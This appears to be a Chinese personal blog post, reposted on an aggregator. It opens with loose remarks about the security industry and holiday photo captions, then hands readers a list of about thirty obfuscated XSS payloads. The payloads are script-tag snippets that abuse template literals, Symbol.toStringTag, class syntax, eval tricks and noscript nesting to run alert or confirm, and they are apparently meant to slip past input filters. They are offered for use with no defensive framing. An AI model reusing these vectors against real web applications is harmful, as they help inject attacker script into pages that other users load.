瞎扯与xss
Posted me记录
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了瞎扯与xss相关的知识,希望对你有一定的参考价值。
瞎扯
发了,最近知道一些事情,想了想,还是不走纯技术了,尽量走些大的方向,或者生活趣事,娱乐新闻啥的,还有一句话特别想说,将军坟前无人问,戏子家事天下知,这种事情,真正的原因我想大家都知道,毕竟八卦戏子不会出事,对了还有就是这行在15年之前的没几个是科班出身的,大家都是慢慢打拼出来的,你的悲惨经历说出来毫无意义,与君共勉
by
me
胡说八道
遇见与分享
地球某处
Tue.Oct.10
此时此地
Wish you were here.
朵奶奶家的菜地
菜国庆去玩的某个地方
此时此地
Wish you were here.
菜国庆去玩的某个地方
me运营社
那么以下就是送给各位看官的xss
在线任意进制转换计算
http://jinzhi.supfree.net/
http://tool.httpcn.com/Tool/JinZhiZhuanHuan.html
<script>[...`${alert(1)}`]</script>
<script>00000`${alert(1)}`</script>
<script>new new new `${alert(1)/*}`*/}`</script>
<script>a=`jackmasa<!--<script/\`;</script>
<input value="${alert(1)}`</script/">
<script>String.raw(a=alert(1),1,2)</script>
<script>a=`
${alert`1`}`</script>
<script>a=`${alert/*}`;
b=`*/(1)}`;</script>
<script>x=x=>x=>x=>x=>x=>x=>x=>alert(1);x()()()()()()()()</script>
<script>o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()</script>
<script>eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(1)`);</script>
<script>x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())</script>
<script>!class extends`${alert(1)}```{}</script>
<script>f=(x=alert(1))=>{}; f();</script>
<script>Array.prototype[Symbol.hasInstance]=eval;
"alert(1)" instanceof [];</script>
<script>
({[alert(1)](){}});
({get[alert(2)](){}});
({set[alert(3)](a){}});
</script>
<script>Array[Symbol.species].constructor('alert(1)')();</script>
<script> ({[alert`M`]:1})</script>
<script>Lol:Function`alert(1)```````````</script>
<script>new new new new new alert`1`</script>
<noscript><noscript></noscript><script>confirm(1)</script></noscript>
<script>alert``</script>
<script>!function(lol=alert(1)){}()</script>
<script>(function([a,b,c]=[1,2,3]){alert(`${a},${b},${c}`)})()</script>
<script>new alert`1`</script>
<script>-{'valueOf'(){setTimeout(this)},[Symbol['toStringTag']]:'=alert`1`'}</script>
<script>-{valueOf(){alert`:D`}}</script>
<script>delete []['__proto__']['toString'];
[]['__proto__'][Symbol.toStringTag]='=alert(1)';
eval([1,2,3]+'');</script>
<script>object=1;eval({[Symbol.toStringTag]: ',alert(1)'}+'')</script>
me运营社
每一次遇见
都会有新的感想
以上是关于瞎扯与xss的主要内容,如果未能解决你的问题,请参考以下文章